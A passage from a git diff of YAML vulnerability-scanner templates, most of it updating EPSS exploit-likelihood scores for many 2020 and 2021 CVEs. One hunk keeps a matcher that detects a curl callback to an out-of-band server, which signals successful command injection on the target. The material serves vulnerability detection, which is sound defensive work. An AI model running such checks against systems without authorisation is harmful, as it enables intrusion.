CWE-89 - epss-score: 0.05987 - epss-percentile: 0.92516 + epss-score: 0.06298 + epss-percentile: 0.92793 cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index fcaaa6ee5c..8d74d608e7 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -24,8 +24,8 @@ info: cvss-score: 7 cve-id: CVE-2020-9484 cwe-id: CWE-502 - epss-score: 0.97119 - epss-percentile: 0.9968 + epss-score: 0.96955 + epss-percentile: 0.99629 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index d0cb28604c..542197b50b 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-9496 cwe-id: CWE-502 - epss-score: 0.975 - epss-percentile: 0.99963 + epss-score: 0.97502 + epss-percentile: 0.99974 cpe: cpe:2.3:a:apache:ofbiz:17.12.03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 148644ebc1..e2d1644d39 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9757 cwe-id: CWE-74 - epss-score: 0.97161 - epss-percentile: 0.99705 + epss-score: 0.96999 + epss-percentile: 0.99646 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index bdeb6668e5..f8c6c18b57 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -18,9 +18,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-1472 - cwe-id: CWE-119,CWE-287 - epss-score: 0.97285 - epss-percentile: 0.99783 + cwe-id: CWE-287,CWE-119 + epss-score: 0.97318 + epss-percentile: 0.99832 cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml index c819787955..1b381ba421 100644 --- a/http/cves/2021/CVE-2021-1497.yaml +++ b/http/cves/2021/CVE-2021-1497.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-1497 cwe-id: CWE-78 - epss-score: 0.97531 - epss-percentile: 0.99984 + epss-score: 0.97458 + epss-percentile: 0.99942 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\(2a\):*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 058d924a80..3ae62314a3 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-1498 cwe-id: CWE-78 - epss-score: 0.97531 - epss-percentile: 0.99984 + epss-score: 0.97458 + epss-percentile: 0.99942 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 50d16bfb90..7d6c59f842 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-1499 cwe-id: CWE-306 - epss-score: 0.97246 - epss-percentile: 0.99761 + epss-score: 0.96594 + epss-percentile: 0.99481 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index e4f0d0abe8..36863e4ce7 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-20031 cwe-id: CWE-601 epss-score: 0.01202 - epss-percentile: 0.83464 + epss-percentile: 0.83646 cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml index eed9339c24..74ac86364f 100644 --- a/http/cves/2021/CVE-2021-20038.yaml +++ b/http/cves/2021/CVE-2021-20038.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-20038 cwe-id: CWE-787,CWE-121 - epss-score: 0.96076 - epss-percentile: 0.99265 + epss-score: 0.95763 + epss-percentile: 0.99226 cpe: cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20090.yaml b/http/cves/2021/CVE-2021-20090.yaml index 100a7fcdce..0f8dd8f3f8 100644 --- a/http/cves/2021/CVE-2021-20090.yaml +++ b/http/cves/2021/CVE-2021-20090.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-20090 cwe-id: CWE-22 - epss-score: 0.97441 - epss-percentile: 0.99913 + epss-score: 0.97041 + epss-percentile: 0.99664 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index b64a33fb89..96b3d3b850 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-20091 - epss-score: 0.00814 - epss-percentile: 0.79621 + epss-score: 0.00928 + epss-percentile: 0.81211 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index 13f9912daa..ee405c4862 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-20092 cwe-id: CWE-287 epss-score: 0.01372 - epss-percentile: 0.84606 + epss-percentile: 0.84771 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index fe329b1341..6000bd4eed 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-20114 cwe-id: CWE-425 epss-score: 0.0178 - epss-percentile: 0.86493 + epss-percentile: 0.86622 cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index fa7cd9e1f0..c91634d378 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20123 cwe-id: CWE-22 - epss-score: 0.05307 - epss-percentile: 0.92084 + epss-score: 0.03817 + epss-percentile: 0.90823 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 054fa75bf0..169d67d5bd 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20124 cwe-id: CWE-22 - epss-score: 0.02141 - epss-percentile: 0.87833 + epss-score: 0.0152 + epss-percentile: 0.85542 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index 2f09eb4547..c713ed19f2 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-20137 cwe-id: CWE-79 epss-score: 0.3285 - epss-percentile: 0.96459 + epss-percentile: 0.96504 cpe: cpe:2.3:o:gryphonconnect:gryphon_tower_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 39b290fd00..27204b1474 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-20150 cwe-id: CWE-306 - epss-score: 0.16176 - epss-percentile: 0.95283 + epss-score: 0.14411 + epss-percentile: 0.95096 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index 5b03d8cd54..44d8cd9a22 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-20158 cwe-id: CWE-306 epss-score: 0.01211 - epss-percentile: 0.83527 + epss-percentile: 0.83703 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index 3411c82e32..4807654df8 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-20167 cwe-id: CWE-77 epss-score: 0.95111 - epss-percentile: 0.99023 + epss-percentile: 0.99072 cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: word part: interactsh_request words: - - "User-Agent: curl" \ No newline at end of file + - "User-Agent: curl" diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 3e443f5567..69ba7489e7 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20323 cwe-id: CWE-79 - epss-score: 0.00222 - epss-percentile: 0.59851 + epss-score: 0.00266 + epss-percentile: 0.63862 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index 4a4b37648e..54e863a8c2 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-20792 cwe-id: CWE-79 epss-score: 0.002 - epss-percentile: 0.57161 + epss-percentile: 0.5757 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index 5f845862ba..0df9216c95 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-20837 cwe-id: CWE-78 - epss-score: 0.97158 - epss-percentile: 0.99701 + epss-score: 0.97165 + epss-percentile: 0.99734 cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index cc7b6ddef1..14407c544f 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2021-21087 cwe-id: CWE-79 - epss-score: 0.00145 - epss-percentile: 0.49708 + epss-score: 0.00293 + epss-percentile: 0.65629 cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:* metadata: max-request: 7 diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index 533ed50151..e2990ecb3c 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.7 cve-id: CVE-2021-21234 cwe-id: CWE-22 - epss-score: 0.97064 - epss-percentile: 0.99653 + epss-score: 0.97001 + epss-percentile: 0.99648 cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 94a8b42689..6cd1bdf37b 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.7 cve-id: CVE-2021-21287 cwe-id: CWE-918 - epss-score: 0.97296 + epss-score: 0.97264 epss-percentile: 0.99792 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index da5b6ff56d..3e00b9c448 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21307 cwe-id: CWE-862 - epss-score: 0.973 - epss-percentile: 0.99795 + epss-score: 0.97384 + epss-percentile: 0.99883 cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index 6fdf26fe38..d578cf142b 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-21311 cwe-id: CWE-918 - epss-score: 0.00795 - epss-percentile: 0.79414 + epss-score: 0.00925 + epss-percentile: 0.81174 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 6 diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml index d36f09bba2..b5ac6a3a67 100644 --- a/http/cves/2021/CVE-2021-21315.yaml +++ b/http/cves/2021/CVE-2021-21315.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.8 cve-id: CVE-2021-21315 cwe-id: CWE-78 - epss-score: 0.97213 - epss-percentile: 0.99738 + epss-score: 0.96899 + epss-percentile: 0.99607 cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index 7614877da1..1ac71e020b 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.9 cve-id: CVE-2021-21345 cwe-id: CWE-78,CWE-502 - epss-score: 0.35598 - epss-percentile: 0.96598 + epss-score: 0.33127 + epss-percentile: 0.96513 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index 3d1a6cd115..6a6e2ab3fe 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.1 cve-id: CVE-2021-21351 cwe-id: CWE-434 - epss-score: 0.9411 - epss-percentile: 0.9883 + epss-score: 0.93863 + epss-percentile: 0.98854 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index dd77e79f93..ca6efccd3d 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-21389 cwe-id: CWE-863 - epss-score: 0.77888 - epss-percentile: 0.97815 + epss-score: 0.74875 + epss-percentile: 0.97778 cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index 7504730d05..7ba71a33a6 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-21402 cwe-id: CWE-22 - epss-score: 0.23511 - epss-percentile: 0.95936 + epss-score: 0.19376 + epss-percentile: 0.95691 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml index 7704b83310..af4352e4eb 100644 --- a/http/cves/2021/CVE-2021-21479.yaml +++ b/http/cves/2021/CVE-2021-21479.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.1 cve-id: CVE-2021-21479 cwe-id: CWE-74 - epss-score: 0.00281 - epss-percentile: 0.64444 + epss-score: 0.00242 + epss-percentile: 0.61805 cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 03eb0255b8..b11df58a85 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.3 cve-id: CVE-2021-21745 cwe-id: CWE-352 - epss-score: 0.23979 - epss-percentile: 0.95971 + epss-score: 0.39266 + epss-percentile: 0.968 cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index 84b6766692..ae922b5aa2 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-21799 cwe-id: CWE-79 - epss-score: 0.85976 - epss-percentile: 0.98127 + epss-score: 0.83742 + epss-percentile: 0.98064 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index 92d5e5cb7d..8ae28f6eee 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-21800 cwe-id: CWE-79 - epss-score: 0.85976 - epss-percentile: 0.98127 + epss-score: 0.83742 + epss-percentile: 0.98064 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index af333276ef..3fd8403c5d 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-21801 cwe-id: CWE-79 - epss-score: 0.85976 - epss-percentile: 0.98127 + epss-score: 0.83742 + epss-percentile: 0.98064 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index 790bbd4238..a81347890d 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-21802 cwe-id: CWE-79 - epss-score: 0.85976 - epss-percentile: 0.98127 + epss-score: 0.83742 + epss-percentile: 0.98064 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index 67cb755ed0..859b29a766 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-21803 cwe-id: CWE-79 - epss-score: 0.85976 - epss-percentile: 0.98127 + epss-score: 0.83742 + epss-percentile: 0.98064 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index e04f578486..ef60746ae9 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21805 cwe-id: CWE-78 - epss-score: 0.97394 - epss-percentile: 0.99872 + epss-score: 0.97345 + epss-percentile: 0.99851 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index fc3413e87a..b71ce48aa6 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-21816 cwe-id: CWE-200 epss-score: 0.00255 - epss-percentile: 0.62674 + epss-percentile: 0.63082 cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml index 252a994146..22ac26d836 100644 --- a/http/cves/2021/CVE-2021-21881.yaml +++ b/http/cves/2021/CVE-2021-21881.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.9 cve-id: CVE-2021-21881 cwe-id: CWE-78 - epss-score: 0.97105 - epss-percentile: 0.99673 + epss-score: 0.97194 + epss-percentile: 0.99751 cpe: cpe:2.3:o:lantronix:premierwave_2050_firmware:8.9.0.0:r4:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml index ef9460bab1..bc01ae3f06 100644 --- a/http/cves/2021/CVE-2021-21972.yaml +++ b/http/cves/2021/CVE-2021-21972.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21972 cwe-id: CWE-22 - epss-score: 0.97432 - epss-percentile: 0.99903 + epss-score: 0.97413 + epss-percentile: 0.99902 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml index e41937800f..b9e58ebcac 100644 --- a/http/cves/2021/CVE-2021-21973.yaml +++ b/http/cves/2021/CVE-2021-21973.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-21973 cwe-id: CWE-918 - epss-score: 0.17148 - epss-percentile: 0.95393 + epss-score: 0.35549 + epss-percentile: 0.96643 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml index 3e3707d769..04070296a7 100644 --- a/http/cves/2021/CVE-2021-21975.yaml +++ b/http/cves/2021/CVE-2021-21975.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-21975 cwe-id: CWE-918 - epss-score: 0.97437 - epss-percentile: 0.9991 + epss-score: 0.96835 + epss-percentile: 0.9957 cpe: cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 1fde947a09..f8bac30a4d 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21978 cwe-id: CWE-20 - epss-score: 0.97519 - epss-percentile: 0.99976 + epss-score: 0.97392 + epss-percentile: 0.99888 cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index a9813fb595..32311c804d 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21985 cwe-id: CWE-20 - epss-score: 0.97454 - epss-percentile: 0.99926 + epss-score: 0.9737 + epss-percentile: 0.99866 cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index 13adc4933a..0792d7256d 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22005 cwe-id: CWE-22 - epss-score: 0.97237 - epss-percentile: 0.99755 + epss-score: 0.97073 + epss-percentile: 0.99682 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index 82c3b70e18..68d8c43395 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-22053 cwe-id: CWE-94 - epss-score: 0.7163 - epss-percentile: 0.97629 + epss-score: 0.65508 + epss-percentile: 0.97517 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index cb6350a7b7..7b3c9eedb8 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-22054 cwe-id: CWE-918 - epss-score: 0.76256 - epss-percentile: 0.97769 + epss-score: 0.72885 + epss-percentile: 0.97728 cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 422b517aa4..d189c89c38 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-22122 cwe-id: CWE-79 - epss-score: 0.11206 - epss-percentile: 0.94436 + epss-score: 0.00572 + epss-percentile: 0.75382 cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index e8fcc2023b..5f9d8c3908 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-22145 cwe-id: CWE-209 - epss-score: 0.36411 - epss-percentile: 0.96626 + epss-score: 0.96737 + epss-percentile: 0.99537 cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 38b481b42f..177ce4f7f0 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2021-22205 cwe-id: 